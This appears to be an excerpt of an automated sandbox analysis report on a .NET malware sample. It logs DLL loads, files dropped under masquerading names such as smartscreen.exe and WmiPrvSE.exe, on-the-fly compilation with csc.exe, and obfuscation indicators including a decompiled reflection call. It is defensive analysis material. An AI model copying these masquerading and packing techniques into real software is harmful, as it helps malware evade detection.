                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: winnsi.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: rasapi32.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: rasman.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: rtutils.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: mswsock.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: winhttp.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: rasadhlp.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: fwpuclnt.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: winmm.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: winmmbase.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: mmdevapi.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: devobj.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: ksuser.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: avrt.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: audioses.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: powrprof.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: umpdc.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: msacm32.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: midimap.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: dwrite.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: edputil.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: windowscodecs.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: ntmarta.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: dpapi.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: version.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: wldp.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: profapi.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\WmiPrvSE.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDirectory created: C:\Program Files\Windows Mail\rCdgcwByUDmMcQzYkDZywyWr.exeJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDirectory created: C:\Program Files\Windows Mail\6562cf32ce99caJump to behavior
                              Source: r6cRyCpdfS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: r6cRyCpdfS.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                              Source: r6cRyCpdfS.exeStatic file information: File size 3615744 > 1048576
                              Source: r6cRyCpdfS.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x372400
                              Source: r6cRyCpdfS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.pdb source: r6cRyCpdfS.exe, 00000000.00000002.1746716592.0000000003482000.00000004.00000800.00020000.00000000.sdmp

                              Data Obfuscation

                              barindex
                              .NET source code contains method to dynamically call methods (often used by packers)
                              Source: r6cRyCpdfS.exe, DmNaYRejPaLkffETTbT.cs.Net Code: Type.GetTypeFromHandle(kt5vW4aVDO3SyIH5XQy.vqocSJAHS5B(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(kt5vW4aVDO3SyIH5XQy.vqocSJAHS5B(16777245)),Type.GetTypeFromHandle(kt5vW4aVDO3SyIH5XQy.vqocSJAHS5B(16777259))})
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.cmdline"
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 0_2_00007FFD9B884749 push ebx; iretd 0_2_00007FFD9B884754
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 0_2_00007FFD9BC44171 push edi; ret 0_2_00007FFD9BC4418A
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 0_2_00007FFD9BC43931 push esp; ret 0_2_00007FFD9BC4394A
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 0_2_00007FFD9BC438E1 push edx; ret 0_2_00007FFD9BC4391A
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 0_2_00007FFD9BC43C60 push esi; ret 0_2_00007FFD9BC43CCA
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 0_2_00007FFD9BFD812C push ebx; ret 0_2_00007FFD9BFD816A
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 0_2_00007FFD9BFD7560 push ebx; iretd 0_2_00007FFD9BFD756A
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 23_2_00007FFD9B8A4749 push ebx; iretd 23_2_00007FFD9B8A4754
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 25_2_00007FFD9B8D5728 push edx; iretd 25_2_00007FFD9B8D572B
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 25_2_00007FFD9B8D7940 push ebx; retf 25_2_00007FFD9B8D796A
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 25_2_00007FFD9B8D74C6 push esi; iretd 25_2_00007FFD9B8D74C7
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 25_2_00007FFD9B8B288F push ebp; retf 25_2_00007FFD9B8B2890
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 25_2_00007FFD9B8A4749 push ebx; iretd 25_2_00007FFD9B8A4754
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeCode function: 27_2_00007FFD9B894749 push ebx; iretd 27_2_00007FFD9B894754
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeCode function: 27_2_00007FFD9B8C5728 push edx; iretd 27_2_00007FFD9B8C572B
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeCode function: 27_2_00007FFD9B8C7940 push ebx; retf 27_2_00007FFD9B8C796A
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeCode function: 27_2_00007FFD9B8C74C6 push esi; iretd 27_2_00007FFD9B8C74C7
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeCode function: 27_2_00007FFD9B8A288F push ebp; retf 27_2_00007FFD9B8A2890
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeCode function: 28_2_00007FFD9B894749 push ebx; iretd 28_2_00007FFD9B894754
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 30_2_00007FFD9B874749 push ebx; iretd 30_2_00007FFD9B874754
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 30_2_00007FFD9B8A5728 push edx; iretd 30_2_00007FFD9B8A572B
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 30_2_00007FFD9B8A7940 push ebx; retf 30_2_00007FFD9B8A796A
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 30_2_00007FFD9B8A74C6 push esi; iretd 30_2_00007FFD9B8A74C7
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 30_2_00007FFD9B88288F push ebp; retf 30_2_00007FFD9B882890
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 31_2_00007FFD9B8C5728 push edx; iretd 31_2_00007FFD9B8C572B
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 31_2_00007FFD9B8C7940 push ebx; retf 31_2_00007FFD9B8C796A
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 31_2_00007FFD9B8C74C6 push esi; iretd 31_2_00007FFD9B8C74C7
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 31_2_00007FFD9B894749 push ebx; iretd 31_2_00007FFD9B894754
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 31_2_00007FFD9B8A288F push ebp; retf 31_2_00007FFD9B8A2890
                              Source: C:\Recovery\WmiPrvSE.exeCode function: 32_2_00007FFD9B8D5728 push edx; iretd 32_2_00007FFD9B8D572B
                              Source: C:\Recovery\WmiPrvSE.exeCode function: 32_2_00007FFD9B8D7940 push ebx; retf 32_2_00007FFD9B8D796A
                              Source: r6cRyCpdfS.exe, IQpCUHs3SQoObqLbJFq.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'jAvwHKVGMaM', 'I76wswVNlxN', 'Ri5eFOwURNtkAwcqnaIN', 'olOM6AwUvZ2K7pLRwsEy', 'jNyXXXwUgfh2I8rcbDVg'
                              Source: r6cRyCpdfS.exe, DmNaYRejPaLkffETTbT.csHigh entropy of concatenated method names: 'vlfssIwoCxrU43uhGTlK', 'TqRaMGwoYdqTO3mwhejD', 'apkoBrrRVK', 'UoGUkjwo5ql6rf2kQiOA', 'r1WPB9woTubEvT1An6BR', 'sjEaeYwoQ5xUPxfibFUg', 'cFMUNwwoERIRHa0g5GZV', 'FfLwJhwoBbMTeJDZIsyq', 'L32tyhwoh1nLf9m8ACYH', 'DH6oCxwom3Vs38iy06td'
                              Source: r6cRyCpdfS.exe, UeXadiNVtWEMWBXqF7x.csHigh entropy of concatenated method names: 'y8RNNdwvDB', 'rRXetewGG96R4WXQohL9', 'ClnXDMwGnyKS9YNtgCIn', 'eNcR3bwGdpIZ32eGXfRR', 'LraiNhwG6qouD5d6d6is', 'lLMNFudUhQ', 'lGnhKuwGyovigZiSBMhX', 'tFY9G9wGf7wai7j9Tmh3', 'dOfBsjwG7FH6vJrcnGFO', 'eJrYt8wGkJMb9SVembE9'
                              Source: r6cRyCpdfS.exe, XLIcaKrw4vNAfudfM7h.csHigh entropy of concatenated method names: 'YearKIorUu', 'HqJrseSl1X', 'u7OrSxtLRC', 'tSWSXgw7Kqf0jZBj1PYi', 'S1mmUiw7w3n8tXCMBxj9', 'LE8iw2w7cN0KoW4yhsWC', 'ctGsxpw7sK7jn168Zi8d', 'nnjV8Ow7SxRGeUc3mXKt', 'u2JjTuw7XLdXjbukqMo8', 'gjsOE3w7rXdpGTyO24lZ'
                              Source: r6cRyCpdfS.exe, wCqEy1r1FKh34QmX06S.csHigh entropy of concatenated method names: 'XEFrgC4jAF', 'E3nnFIw7ndAOldhww8YT', 'mukC54w748V4DMBoZ0Dr', 'obSo58w7LPlXW6Byd2Re', 'mN4TX5w7dXDppKEJ8Gp6', 'eUMIADw7G8ZwSeUoGjRW', 'OUJrM8Vj2S', 'IpFr8FDCdg', 'sHZri5Gn2J', 'qdgrb0qruE'
                              Source: r6cRyCpdfS.exe, oRjSWqbQ5xQruxdC2No.csHigh entropy of concatenated method names: 'klDbBrALSc', 'fYRbhbkt3W', 'O23bmNVnZW', 'ECabeqAWPV', 'Hy5boytr7C', 'kvIjeOwCGc5vuCEuTVus', 'dn2vnbwC60dd6li25wY0', 'zacWETwCqpKJpFwqHt1K', 'G0rJ2owCCf9NXUuwnsHv', 'mZxaHTwCYmcZiqrMB8X7'
                              Source: r6cRyCpdfS.exe, DcqJQjHvKOAtbUbrCLs.csHigh entropy of concatenated method names: 'heyHxjBJhg', 'SeXHUTRRrm', 'gjxHyNDWDq', 'BywHfT6lSA', 'tx1H7kYqMd', 'OqCHk490JD', 'npKNaawk96qGAE4XkTqb', 'ysTlpUwkA70eEMaNIBJV', 'L05s3Zwk50rMwgq2FijQ', 'J3Xh8wwkTPuHeaMIKB31'
                              Source: r6cRyCpdfS.exe, oP3RPXN5SIosNEWqDaj.csHigh entropy of concatenated method names: 'eONwHJArckW', 'uvINQYBlPI', 'Wq9wHjrVfTt', 'b6i4nQw6JQkAVe8eGej3', 'k3AZrNw6jxg8WPxoxBV4', 'RD455Rw6IWYEEwuVV5ps', 'sQmMAxw6FLVmngaYPiaF', 'P7WWP5w6ZEAqG7Ukl38M', 'gEOBwIw61TjYB8ry3iJ0', 'KGO2vMw6NXovAMWqiGU7'
                              Source: r6cRyCpdfS.exe, oubvqYv6FQqk6fXhyov.csHigh entropy of concatenated method names: 'NIAvaYgLXK', 'mLGvzTacrO', 'gPMvCFFEdT', 'CdtvYOhkwh', 'W0QvusadAj', 'Jajv9432wL', 'PInvA2K6DH', 'jhwv5kHfsm', 'hhuvTu20Mc', 'z03vQaJgVR'
                              Source: r6cRyCpdfS.exe, FZKL3ucypDIpIaL179o.csHigh entropy of concatenated method names: 'tLrc6AwtMj', 'wTXcq792QZ', 'N6dlK2wgdTP8kr8cCx9e', 'W2vhR8wgLDJms63kYTkD', 'Mde1XfwgnefQKXQNdc8f', 'hZOc9BQA8r', 'crECnCwgCY0pCaQ1kyyx', 'BZnXVJwgY44pyjIbqB4O', 'CFOjwIwg647QLveNCAyb', 'W9vPL4wgqXUdb3EekKhW'
                              Source: r6cRyCpdfS.exe, MxRM7Ar6GHxM2EpP40o.csHigh entropy of concatenated method names: 'LeyrmGwbMD', 'rFDrerlSQZ', 'yboJEVwksabOIjdDv9Ky', 'r9l23wwkcf2Mk325OQtG', 'VBlb4NwkK7fUfbIgOuKZ', 'JfMrCW0Xcw', 'kcerYopZsS', 'QX7rukWcUe', 'lx0r9DDh3c', 'CKNrAMllDV'
                              Source: r6cRyCpdfS.exe, IaiXaxkTUCHyKOC26bb.csHigh entropy of concatenated method names: 'nJuBXuwQYD0ghGyne9x0', 'YEVJFuwQqLqY1GJ3Wuqs', 's4CH4twQCAneOEnESmf6', 'pOA71bwQuEGCPypHLKlF', 'O15kE15AKp', 'Mh9', 'method_0', 'BnLkBvN8Qf', 'pCRkhMOVKq', 'vPikmPPBo2'
                              Source: r6cRyCpdfS.exe, XppcUuvKiQEDJWwkFYg.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'p0vvSDHA2C', 'Write', 'ukCvXlQSvq', 'lk0vr4jrqT', 'Flush', 'vl7'
                              Source: r6cRyCpdfS.exe, rMmP9BIDi6erk536Jc5.csHigh entropy of concatenated method names: 'Dispose', 'TsKIPnyMhV', 'MgOIV8U4iG', 'm0yII4ru5P', 'askOnGwLBtNnI5uCATd6', 'GoqbxhwLhssYY02AuajX', 'z5nJBqwLmIrWpYZ37Hff', 'RPy1dawLeaJ5eUNqMBQJ', 'Gb26McwLoYltAXcXtsNy'
                              Source: r6cRyCpdfS.exe, TGULooWCqd1GQHd7DXq.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'HI6WuPd08q', 'I7LW9takhL', 'Dispose', 'D31', 'wNK'
                              Source: r6cRyCpdfS.exe, j7LcFKxGFdFTrWQeRvI.csHigh entropy of concatenated method names: 'sPExqbQ8NR', 'XDOxCPaafq', 'Ak7xYFxnl8', 'vo3xub0cX3', 'Jfwx9XbTAo', 'AKbxAILCtH', 'Hkrx57c0Fb', 'h1fxTk2fN9', 'mItxQCljrW', 'M7fxEaDIE8'
                              Source: r6cRyCpdfS.exe, W6u9W71gZ3pniXEXFnL.csHigh entropy of concatenated method names: 'LIW14u0WpJ', 't1I9PgwdBCSJjhLEKj8m', 'EDv6TTwdQ9vw6hjDpodB', 'vGpE3swdEIFy3OD2mPRF', 'eDtto8wdhm0SI5dPX1da', 'fbX1UTrqe9', 'G6t1ydyooS', 'HTD1fY0JJw', 'iNM5Z5wd57dkrJHDdxR3', 'XMkP61wd9HMsSWqjQky1'
                              Source: r6cRyCpdfS.exe, f2OCN0ByFSS69XOCY2W.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 't6aB7huCbv', 'aopJ2IwmJ30rVfXZkl1i', 'y8wD09wmjwwMZy6yeS5i', 'm8PvMNwmZ8Vxog8BThn4', 'ti9oJMwm1XdbVOCp2Dyn', 'gBbl54wmNxoIpl8UusFX', 'xf4iogwmMlim7wBZBsHy'
                              Source: r6cRyCpdfS.exe, uUlDKmSFhmmQGYeK4I4.csHigh entropy of concatenated method names: 'gibSvHSjWU', 'y2fSgRPN8c', 'JsaSx5QR5e', 'VVylhSwy4W6uFBrwGjGc', 'bof2YgwykXAqM3rK91Io', 'gpxD2kwyOVRgBA6ProT7', 'wynSbrtZST', 'N14SW062rx', 'Sfbem4wyfAY0xEEKHBFg', 'nXNdR3wyUZ9FuVcMGPyH'
                              Source: r6cRyCpdfS.exe, b9LPKUxyfSZP8SXYeXX.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                              Source: r6cRyCpdfS.exe, bRwXJYRyO0l0UHLGyKt.csHigh entropy of concatenated method names: 'method_0', 'vJjR7SEhv7', 'VE0RkLHkl9', 'YOXROU6ieG', 'fEfR4ysCyv', 'C9lRLpjfRL', 'zGbRnb33tZ', 'VloSXEwu0lp0gY4e4XNX', 'DZaXJBwuDqtpKwQPqjbZ', 'rRb9dhwu2KyFkAMAgLiv'
                              Source: r6cRyCpdfS.exe, Mo4N1YH8TemqfCQqQqp.csHigh entropy of concatenated method names: 'ueVHbpMH5s', 'gIwj4vwkkvSb4IIllPN9', 'WRsNK6wkOPx1INh451me', 'cTtF2Ewk4cqalSDs6GwS', 'zXTGOZwkLtF3GAGJBgJX', 'z3PldqwknXl7WTvlsM8o', 'U8ALFNwkf65HEIRZMPHa', 'AG1NyAwk7yX8FkVcA9Zl', 'LF2IpswkddQBJ42himJr'
                              Source: r6cRyCpdfS.exe, dFfi7KlcEBXhvM6OT8r.csHigh entropy of concatenated method names: 'tYslsHQwCk', 'SSalSa1uZt', 'lJelX35bVH', 'a8glrTbiQo', 'Bh3lHooqhP', 'm4fllJu265', 'XUVl0r7fmr', 'ugYlDyRwjU', 'Dh0l22BW9I', 'GfFlP2ajLk'
                              Source: r6cRyCpdfS.exe, CRhCQamyFvJiPSCnyH3.csHigh entropy of concatenated method names: 'x69m7C2Swc', 'oJTmk0TXEM', 'z24mO6qgOi', 'q6Em4pFRJL', 'Dispose', 'oO7HFHwephNLImEk0SIi', 'sMviGywezIVK7nC2JE0e', 'ijdrhcwotwLTJN3oMByv', 'Vn7SqvwowTrpZAbBwo5l', 'Bg4wOfwocGSjLkCUHfJL'
                              Source: r6cRyCpdfS.exe, fUvlZWSQobJUBfKtvvu.csHigh entropy of concatenated method names: 'mXbSovYEpZ', 'srDSaHjSTh', 'f0oSpfUkds', 'xYNSzdFZVM', 'CfSXtoFxOC', 'SVaXwEQJ6g', 'ikHXcCewT2', 'FE3FZowf2xJAvfSVlcIj', 'ytkVXZwf0HVClEc2DhcC', 'cugcluwfDrCH5xcgs7de'
                              Source: r6cRyCpdfS.exe, lLFrXOetvCnos6s0oJw.csHigh entropy of concatenated method names: 'J6sesL4CZC', 'nPkeShopXD', 'FXxJItwo3ImvpWXKSYUn', 'zyyr3NwoRZ2d2Lk1QkXX', 'h166xJwobneCSXbBP2B5', 'PL4i00woWlI5Jh5Su7EB', 'fRyYASwov1gSIyscwhSj', 'pNTyD6wogi5sZCg7PW6w', 'MiOecJbTFv', 'ARlQSpwoMUpVRAcPWDDu'
                              Source: r6cRyCpdfS.exe, xwG0nABLrwBqls9wojL.csHigh entropy of concatenated method names: 'kcXwHR9ru9M', 'eruwX3naIGi', 'vtUFPdwmTwcs2qsCjlxA', 'nLelHDwmAGuIR8keJp1Y', 'hQ5QTkwm5Ag9GGOWIeUo', 'fUZswCwmQnZhFFMZMQ5n', 'HhKI4Rwmmu049Ui4eg2D', 'jgHwJawmBomDM5uuE1Yo', 'Pi9vMtwmh82hUDMyAvUC', 'P5wan1wme9QeGEIrRQv7'
                              Source: r6cRyCpdfS.exe, g9wsHTsfYaKBOJOYKh7.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'HRBwHswcpVE', 'I76wswVNlxN', 'Il9ZmnwUkOZYmKw2BWHX', 'TqokkUwUOrsmi1O2nmTj', 'ijeTOFwU4qtQ46LRG9bK', 'Y8pvsAwULTMJcDERLsAb', 'ooPgROwUnj7iBtIrwIrT'
                              Source: r6cRyCpdfS.exe, iEGV7l3bCWTG13FRrHM.csHigh entropy of concatenated method names: 'xut3382IcP', 'P213Rs6MY3', 'qqM3v96N9u', 'PyS3gAqJal', 'KK73xQFVVH', 'z1NR4VwYdpHTH30iKBIf', 'aEC9utwYLdJ0DhehiOQF', 'kFWDHNwYns1b3bOiEWxq', 'MyLtjgwYGmNEyrbK31dM', 'gyL6gZwY6rBuw6H3B7j3'
